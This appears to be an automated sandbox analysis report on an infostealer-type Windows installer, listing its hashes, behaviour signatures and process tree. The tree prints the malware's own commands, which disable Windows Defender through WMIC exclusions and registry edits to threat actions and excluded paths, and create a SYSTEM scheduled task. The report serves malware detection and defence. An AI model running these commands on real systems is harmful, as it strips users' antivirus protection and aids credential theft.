Overview

overview

10

Static

static

3

winprofile

windows7-x64

10

winprofile

windows10-1703-x64

8

Analysis

  • max time kernel
    195s
  • max time network
    245s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    25/07/2024, 22:45

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    a006394a779ca5bbf1be3b21c7ca213bc4603e5407286295d4c69258c4c16844.exe

  • Size

    7.3MB

  • MD5

    e3acea0543ee4583576a61f6568d3216

  • SHA1

    c547db3b84ddf664ae6219566b92d6e18430a201

  • SHA256

    a006394a779ca5bbf1be3b21c7ca213bc4603e5407286295d4c69258c4c16844

  • SHA512

    49f9a2c5a3bff68d97a59cbdfa33188f6d354a19db980e851a3afb7a8f902e43a0ec334c2e2a586e32653765ad0b04789d7a94b6f5b3b702e0f307ab836ba927

  • SSDEEP

    196608:91ObnoYIi4Yoiz2JYjhXDL1OTDG2xhM9XBp0Hm6ieyHuEKK:3OboYFNzOY1qG2M3msvb

Score
8/10
defense_evasiondiscoveryexecutionspywarestealer

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

    execution
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Indirect Command Execution 1 TTPs 2 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

    defense_evasion
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 33 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a006394a779ca5bbf1be3b21c7ca213bc4603e5407286295d4c69258c4c16844.exe
    "C:\Users\Admin\AppData\Local\Temp\a006394a779ca5bbf1be3b21c7ca213bc4603e5407286295d4c69258c4c16844.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4684
    • C:\Users\Admin\AppData\Local\Temp\7zS5DB0.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2452
      • C:\Users\Admin\AppData\Local\Temp\7zS6002.tmp\Install.exe
        .\Install.exe /YWdidoXJ "385132" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:2492
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m calc.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
          4⤵
          • Indirect Command Execution
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:208
          • C:\Windows\SysWOW64\cmd.exe
            /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:444
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2760
              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:4908
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /TN "brlRsAdJaeHYbaQPPR" /SC once /ST 22:47:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS6002.tmp\Install.exe\" NQ /kPXXdidKb 385132 /S" /V1 /F
          4⤵
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:1128
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2492 -s 1032
          4⤵
          • Program crash
          PID:5116
  • C:\Users\Admin\AppData\Local\Temp\7zS6002.tmp\Install.exe
    C:\Users\Admin\AppData\Local\Temp\7zS6002.tmp\Install.exe NQ /kPXXdidKb 385132 /S
    1⤵
    • Executes dropped EXE
    • Drops desktop.ini file(s)
    • Drops file in System32 directory
    • System Location Discovery: System Language Discovery
    • Modifies data under HKEY_USERS
    • Suspicious use of WriteProcessMemory
    PID:4372
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
      2⤵
      • Drops file in System32 directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2228
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3988
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4880
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
        3⤵
        • System Location Discovery: System Language Discovery
        PID:512
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3864
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3480
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1888
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2128
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4708
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1940
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1732
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
        3⤵
        • System Location Discovery: System Language Discovery
        PID:976
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1572
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
        3⤵
        • System Location Discovery: System Language Discovery
        PID:5084
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1300
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2804
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
        3⤵
          PID:5000
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
          3⤵
          • System Location Discovery: System Language Discovery
          PID:1428
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
          3⤵
            PID:2112
          • C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
            3⤵
              PID:1204
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
              3⤵
              • System Location Discovery: System Language Discovery
              PID:3260
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
              3⤵
                PID:3116
              • C:\Windows\SysWOW64\reg.exe
                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                3⤵
                • System Location Discovery: System Language Discovery
                PID:3020
              • C:\Windows\SysWOW64\reg.exe
                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                3⤵
                • System Location Discovery: System Language Discovery
                PID:3244
              • C:\Windows\SysWOW64\reg.exe
                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                3⤵
                • System Location Discovery: System Language Discovery
                PID:3192
              • C:\Windows\SysWOW64\reg.exe
                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                3⤵
                • System Location Discovery: System Language Discovery
                PID:4128
              • C:\Windows\SysWOW64\reg.exe
                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                3⤵
                  PID:4124
                • C:\Windows\SysWOW64\reg.exe
                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:4304
                • C:\Windows\SysWOW64\reg.exe
                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:3104
                • C:\Windows\SysWOW64\reg.exe
                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:2928
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CpQtmNKkksTvAkviLhR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CpQtmNKkksTvAkviLhR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FHBoolplFmUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FHBoolplFmUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OfCUcdUmBfXwC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OfCUcdUmBfXwC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QAWIpintGGMU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QAWIpintGGMU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cIeibrkhU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cIeibrkhU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\GnOWEelXRQHUOVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\GnOWEelXRQHUOVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\fasQHflodNqIPjZRI\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\fasQHflodNqIPjZRI\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\yUEvGNAcZIxQcBNL\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\yUEvGNAcZIxQcBNL\" /t REG_DWORD /d 0 /reg:64;"
                2⤵
                • Drops file in System32 directory
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:5044
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CpQtmNKkksTvAkviLhR" /t REG_DWORD /d 0 /reg:32
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:3840
                  • C:\Windows\SysWOW64\reg.exe
                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CpQtmNKkksTvAkviLhR" /t REG_DWORD /d 0 /reg:32
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:4092
                • C:\Windows\SysWOW64\reg.exe
                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CpQtmNKkksTvAkviLhR" /t REG_DWORD /d 0 /reg:64
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:2924
                • C:\Windows\SysWOW64\reg.exe
                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FHBoolplFmUn" /t REG_DWORD /d 0 /reg:32
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:2372
                • C:\Windows\SysWOW64\reg.exe
                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FHBoolplFmUn" /t REG_DWORD /d 0 /reg:64
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:3180
                • C:\Windows\SysWOW64\reg.exe
                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OfCUcdUmBfXwC" /t REG_DWORD /d 0 /reg:32
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:5020
                • C:\Windows\SysWOW64\reg.exe
                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OfCUcdUmBfXwC" /t REG_DWORD /d 0 /reg:64
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:1160
                • C:\Windows\SysWOW64\reg.exe
                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QAWIpintGGMU2" /t REG_DWORD /d 0 /reg:32
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:3264
                • C:\Windows\SysWOW64\reg.exe
                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QAWIpintGGMU2" /t REG_DWORD /d 0 /reg:64
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:4924
                • C:\Windows\SysWOW64\reg.exe
                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cIeibrkhU" /t REG_DWORD /d 0 /reg:32
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:4352
                • C:\Windows\SysWOW64\reg.exe
                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cIeibrkhU" /t REG_DWORD /d 0 /reg:64
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:2952
                • C:\Windows\SysWOW64\reg.exe
                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\GnOWEelXRQHUOVVB /t REG_DWORD /d 0 /reg:32
                  3⤵
                    PID:2000
                  • C:\Windows\SysWOW64\reg.exe
                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\GnOWEelXRQHUOVVB /t REG_DWORD /d 0 /reg:64
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:4932
                  • C:\Windows\SysWOW64\reg.exe
                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:1464
                  • C:\Windows\SysWOW64\reg.exe
                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:4500
                  • C:\Windows\SysWOW64\reg.exe
                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\fasQHflodNqIPjZRI /t REG_DWORD /d 0 /reg:32
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:2760
                  • C:\Windows\SysWOW64\reg.exe
                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\fasQHflodNqIPjZRI /t REG_DWORD /d 0 /reg:64
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:1168
                  • C:\Windows\SysWOW64\reg.exe
                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\yUEvGNAcZIxQcBNL /t REG_DWORD /d 0 /reg:32
                    3⤵
                      PID:196
